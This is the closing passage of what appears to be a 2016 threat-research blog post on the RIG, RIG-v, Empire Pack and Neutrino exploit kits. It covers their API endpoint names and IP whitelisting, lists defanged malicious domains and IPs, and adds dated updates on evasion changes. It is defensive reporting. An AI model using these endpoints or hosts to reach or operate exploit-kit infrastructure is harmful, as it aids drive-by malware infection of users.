I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections.
[/Speculation]
RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIG
  • api.php : historical RIG
  • api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]
  • remote_api.php : RIG-v
But Empire Pack might be api3, remote_api, or a bit of both of them.

By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing)

Conclusion

Let’s just conclude this post with statistics pages of two Neutrino threads

Picture 18: Neutrino stats - Aus focused thread - 2016-07-15

Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09


We will be known forever by the tracks we leave
Santee Sioux Tribe

Some IOCs

DateDomainIPComment
2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v
2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v
2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)
2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector
2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v
2016-09-28add.alislameyah[.]org193.124.117.13RIG-v
2016-09-28lovesdeals[.]ml198.199.124.116RIG-v
2016-09-27dns.helicopterdog[.]com195.133.201.23RIG
2016-09-26sv.flickscoop[.]net195.133.201.41RIG
2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v
2016-09-26oitutn.yellowcarry[.]top78.46.167.130Neutrino

Acknowledgements

Thanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.

Edits

2016-10-03 :
Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.
Added explanation about the IP whitelisting on RIG API (it was not clear)
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.
https://twitter.com/kafeine/status/790482708870864896

RIG panel
The only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)

RIG-E Behavioral
2016-12-03
RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.

2016-12-03 RIG-v Pre-landing


Read More

RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05